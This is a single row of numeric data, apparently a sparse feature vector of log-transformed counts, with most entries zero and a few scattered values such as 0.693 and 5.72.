0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.58351893845611, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.4849066497880004, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0841946160253872, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 3.7376696182833684, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 2.772588722239781, 0.0, 0.0, 7.358193752733032, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.567740402508133, 0.0, 0.0, 5.030104765080701, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.1354942159291497, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 4.631631038266565, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 2.550898738446989, 0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0910424533583156, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 4.160336650881089, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 5.545177444479562, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.110873864173311, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 6.356107660695892, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 5.723585101952381, 0, 0, 0.0, 0.0, 0, 2.3978952727983707, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0, 0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 1.3862943611198906, 0, 5.723585101952381, 0.0, 0.0, 0, 0.0, 1.6094379124341003, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0910424533583156, 0.0, 3.7369991058576035, 2.5649493574615367, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 1.3862943611198906, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.931825632724326, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 1.3862943611198906, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 2.1972245773362196, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.3862943611198906, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.645446897643238, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 5.0301047650807, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.6931471805599453, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 3.4825185607408002, 0, 3.970291913552122, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.0910424533583156, 0.0, 0, 4.182806904693497, 3.58351893845611, 0, 0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0, 2.3978952727983707, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 2.833213344056216, 0, 0, 0.0, 3.4825185607408002, 0.0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.833213344056216, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 5.101797476893978, 0, 5.375278407684164, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 3.871201010907891, 0, 0.0, 0.0, 0, 0.0, 3.295836866004329, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 1.6094379124341003, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.5263605246161616, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 1.6094379124341003, 0, 3.713572066704308, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 3.4011973816621555, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 3.0841946160253877, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.3862943611198906, 2.9444389791664403, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0, 4.581130849408909, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.833213344056216, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 1.0986122886681098, 0.0, 0.0, 2.1972245773362196, 0.0, 0, 